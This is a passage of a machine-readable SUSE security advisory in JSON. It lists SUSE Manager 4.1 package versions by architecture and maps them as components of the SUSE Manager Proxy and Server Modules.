"product_id": "spacewalk-java-lib-4.1.30-3.31.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"product": {
"name": "spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"product_id": "spacewalk-java-postgresql-4.1.30-3.31.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"product": {
"name": "spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"product_id": "spacewalk-proxy-broker-4.1.4-3.9.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"product": {
"name": "spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"product_id": "spacewalk-proxy-common-4.1.4-3.9.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"product": {
"name": "spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"product_id": "spacewalk-proxy-installer-4.1.6-3.3.2.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"product": {
"name": "spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"product_id": "spacewalk-proxy-management-4.1.4-3.9.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"product": {
"name": "spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"product_id": "spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"product": {
"name": "spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"product_id": "spacewalk-proxy-redirect-4.1.4-3.9.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"product": {
"name": "spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"product_id": "spacewalk-proxy-salt-4.1.4-3.9.4.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"product": {
"name": "spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"product_id": "spacewalk-taskomatic-4.1.30-3.31.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-utils-4.1.14-3.12.2.noarch",
"product": {
"name": "spacewalk-utils-4.1.14-3.12.2.noarch",
"product_id": "spacewalk-utils-4.1.14-3.12.2.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"product": {
"name": "spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"product_id": "spacewalk-utils-extras-4.1.14-3.12.2.noarch"
}
},
{
"category": "product_version",
"name": "subscription-matcher-0.26-3.6.2.noarch",
"product": {
"name": "subscription-matcher-0.26-3.6.2.noarch",
"product_id": "subscription-matcher-0.26-3.6.2.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-doc-indexes-4.1-11.28.4.noarch",
"product": {
"name": "susemanager-doc-indexes-4.1-11.28.4.noarch",
"product_id": "susemanager-doc-indexes-4.1-11.28.4.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-docs_en-4.1-11.28.2.noarch",
"product": {
"name": "susemanager-docs_en-4.1-11.28.2.noarch",
"product_id": "susemanager-docs_en-4.1-11.28.2.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"product": {
"name": "susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"product_id": "susemanager-docs_en-pdf-4.1-11.28.2.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-schema-4.1.19-3.24.4.noarch",
"product": {
"name": "susemanager-schema-4.1.19-3.24.4.noarch",
"product_id": "susemanager-schema-4.1.19-3.24.4.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-schema-sanity-4.1.19-3.24.4.noarch",
"product": {
"name": "susemanager-schema-sanity-4.1.19-3.24.4.noarch",
"product_id": "susemanager-schema-sanity-4.1.19-3.24.4.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-sls-4.1.21-3.26.2.noarch",
"product": {
"name": "susemanager-sls-4.1.21-3.26.2.noarch",
"product_id": "susemanager-sls-4.1.21-3.26.2.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-web-libs-4.1.23-3.18.6.noarch",
"product": {
"name": "susemanager-web-libs-4.1.23-3.18.6.noarch",
"product_id": "susemanager-web-libs-4.1.23-3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "susemanager-web-libs-debug-4.1.23-3.18.6.noarch",
"product": {
"name": "susemanager-web-libs-debug-4.1.23-3.18.6.noarch",
"product_id": "susemanager-web-libs-debug-4.1.23-3.18.6.noarch"
}
},
{
"category": "product_version",
"name": "uyuni-config-modules-4.1.21-3.26.2.noarch",
"product": {
"name": "uyuni-config-modules-4.1.21-3.26.2.noarch",
"product_id": "uyuni-config-modules-4.1.21-3.26.2.noarch"
}
},
{
"category": "product_version",
"name": "xpp3-1.1.4c-11.2.2.noarch",
"product": {
"name": "xpp3-1.1.4c-11.2.2.noarch",
"product_id": "xpp3-1.1.4c-11.2.2.noarch"
}
},
{
"category": "product_version",
"name": "xpp3-javadoc-1.1.4c-11.2.2.noarch",
"product": {
"name": "xpp3-javadoc-1.1.4c-11.2.2.noarch",
"product_id": "xpp3-javadoc-1.1.4c-11.2.2.noarch"
}
},
{
"category": "product_version",
"name": "xpp3-minimal-1.1.4c-11.2.2.noarch",
"product": {
"name": "xpp3-minimal-1.1.4c-11.2.2.noarch",
"product_id": "xpp3-minimal-1.1.4c-11.2.2.noarch"
}
},
{
"category": "product_version",
"name": "xstream-1.4.15~susemanager-3.3.8.noarch",
"product": {
"name": "xstream-1.4.15~susemanager-3.3.8.noarch",
"product_id": "xstream-1.4.15~susemanager-3.3.8.noarch"
}
},
{
"category": "product_version",
"name": "xstream-benchmark-1.4.15~susemanager-3.3.8.noarch",
"product": {
"name": "xstream-benchmark-1.4.15~susemanager-3.3.8.noarch",
"product_id": "xstream-benchmark-1.4.15~susemanager-3.3.8.noarch"
}
},
{
"category": "product_version",
"name": "xstream-javadoc-1.4.15~susemanager-3.3.8.noarch",
"product": {
"name": "xstream-javadoc-1.4.15~susemanager-3.3.8.noarch",
"product_id": "xstream-javadoc-1.4.15~susemanager-3.3.8.noarch"
}
},
{
"category": "product_version",
"name": "xstream-parent-1.4.15~susemanager-3.3.8.noarch",
"product": {
"name": "xstream-parent-1.4.15~susemanager-3.3.8.noarch",
"product_id": "xstream-parent-1.4.15~susemanager-3.3.8.noarch"
}
},
{
"category": "product_version",
"name": "xstream-1.4.15-3.5.2.noarch",
"product": {
"name": "xstream-1.4.15-3.5.2.noarch",
"product_id": "xstream-1.4.15-3.5.2.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "smdba-1.7.8-0.3.6.2.ppc64le",
"product": {
"name": "smdba-1.7.8-0.3.6.2.ppc64le",
"product_id": "smdba-1.7.8-0.3.6.2.ppc64le"
}
},
{
"category": "product_version",
"name": "susemanager-4.1.24-3.20.2.ppc64le",
"product": {
"name": "susemanager-4.1.24-3.20.2.ppc64le",
"product_id": "susemanager-4.1.24-3.20.2.ppc64le"
}
},
{
"category": "product_version",
"name": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.ppc64le",
"product": {
"name": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.ppc64le",
"product_id": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.ppc64le"
}
},
{
"category": "product_version",
"name": "susemanager-tools-4.1.24-3.20.2.ppc64le",
"product": {
"name": "susemanager-tools-4.1.24-3.20.2.ppc64le",
"product_id": "susemanager-tools-4.1.24-3.20.2.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "smdba-1.7.8-0.3.6.2.s390x",
"product": {
"name": "smdba-1.7.8-0.3.6.2.s390x",
"product_id": "smdba-1.7.8-0.3.6.2.s390x"
}
},
{
"category": "product_version",
"name": "susemanager-4.1.24-3.20.2.s390x",
"product": {
"name": "susemanager-4.1.24-3.20.2.s390x",
"product_id": "susemanager-4.1.24-3.20.2.s390x"
}
},
{
"category": "product_version",
"name": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.s390x",
"product": {
"name": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.s390x",
"product_id": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.s390x"
}
},
{
"category": "product_version",
"name": "susemanager-tools-4.1.24-3.20.2.s390x",
"product": {
"name": "susemanager-tools-4.1.24-3.20.2.s390x",
"product_id": "susemanager-tools-4.1.24-3.20.2.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "smdba-1.7.8-0.3.6.2.x86_64",
"product": {
"name": "smdba-1.7.8-0.3.6.2.x86_64",
"product_id": "smdba-1.7.8-0.3.6.2.x86_64"
}
},
{
"category": "product_version",
"name": "susemanager-4.1.24-3.20.2.x86_64",
"product": {
"name": "susemanager-4.1.24-3.20.2.x86_64",
"product_id": "susemanager-4.1.24-3.20.2.x86_64"
}
},
{
"category": "product_version",
"name": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.x86_64",
"product": {
"name": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.x86_64",
"product_id": "susemanager-nodejs-sdk-devel-4.1.10-3.15.2.x86_64"
}
},
{
"category": "product_version",
"name": "susemanager-tools-4.1.24-3.20.2.x86_64",
"product": {
"name": "susemanager-tools-4.1.24-3.20.2.x86_64",
"product_id": "susemanager-tools-4.1.24-3.20.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager Proxy Module 4.1",
"product": {
"name": "SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-suse-manager-proxy:4.1"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Server Module 4.1",
"product": {
"name": "SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-suse-manager-server:4.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "mgr-osad-4.1.5-2.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch"
},
"product_reference": "mgr-osad-4.1.5-2.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-mgr-osa-common-4.1.5-2.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch"
},
"product_reference": "python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-mgr-osad-4.1.5-2.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch"
},
"product_reference": "python3-mgr-osad-4.1.5-2.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-rhnlib-4.1.3-4.3.2.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch"
},
"product_reference": "python3-rhnlib-4.1.3-4.3.2.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-check-4.1.9-4.12.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch"
},
"product_reference": "python3-spacewalk-check-4.1.9-4.12.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-client-setup-4.1.9-4.12.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch"
},
"product_reference": "python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-client-tools-4.1.9-4.12.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch"
},
"product_reference": "python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-4.1.21-4.22.7.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-4.1.23-3.18.6.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch"
},
"product_reference": "spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-minimal-config-4.1.23-3.18.6.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch"
},
"product_reference": "spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-check-4.1.9-4.12.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch"
},
"product_reference": "spacewalk-check-4.1.9-4.12.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-setup-4.1.9-4.12.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch"
},
"product_reference": "spacewalk-client-setup-4.1.9-4.12.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-tools-4.1.9-4.12.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch"
},
"product_reference": "spacewalk-client-tools-4.1.9-4.12.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-broker-4.1.4-3.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch"
},
"product_reference": "spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-common-4.1.4-3.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch"
},
"product_reference": "spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-installer-4.1.6-3.3.2.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch"
},
"product_reference": "spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-management-4.1.4-3.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch"
},
"product_reference": "spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch"
},
"product_reference": "spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-redirect-4.1.4-3.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch"
},
"product_reference": "spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-proxy-salt-4.1.4-3.9.4.noarch as component of SUSE Manager Proxy Module 4.1",
"product_id": "SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch"
},
"product_reference": "spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Proxy Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch"
},
"product_reference": "cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-formula-0.4.0-3.6.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch"
},
"product_reference": "grafana-formula-0.4.0-3.6.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgr-libmod-4.1.7-3.16.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch"
},
"product_reference": "mgr-libmod-4.1.7-3.16.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgr-osa-dispatcher-4.1.5-2.9.4.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch"
},
"product_reference": "mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-exporters-formula-0.9.0-3.19.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch"
},
"product_reference": "prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "prometheus-formula-0.3.1-3.6.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch"
},
"product_reference": "prometheus-formula-0.3.1-3.6.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "py26-compat-salt-2016.11.10-6.11.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch"
},
"product_reference": "py26-compat-salt-2016.11.10-6.11.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-mgr-osa-common-4.1.5-2.9.4.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch"
},
"product_reference": "python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch"
},
"product_reference": "python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-rhnlib-4.1.3-4.3.2.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch"
},
"product_reference": "python3-rhnlib-4.1.3-4.3.2.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-client-tools-4.1.9-4.12.4.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch"
},
"product_reference": "python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "smdba-1.7.8-0.3.6.2.ppc64le as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le"
},
"product_reference": "smdba-1.7.8-0.3.6.2.ppc64le",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "smdba-1.7.8-0.3.6.2.s390x as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x"
},
"product_reference": "smdba-1.7.8-0.3.6.2.s390x",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "smdba-1.7.8-0.3.6.2.x86_64 as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64"
},
"product_reference": "smdba-1.7.8-0.3.6.2.x86_64",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-app-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-app-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-applet-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-iss-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-iss-export-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-server-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-server-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-sql-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-tools-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch"
},
"product_reference": "spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"relates_to_product_reference": "SUSE Manager Server Module 4.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-base-4.1.23-3.18.6.noarch as component of SUSE Manager Server Module 4.1",
"product_id": "SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch"
},
"product_reference": "spacewalk-base-4.1.23-3.18.6.noarch",
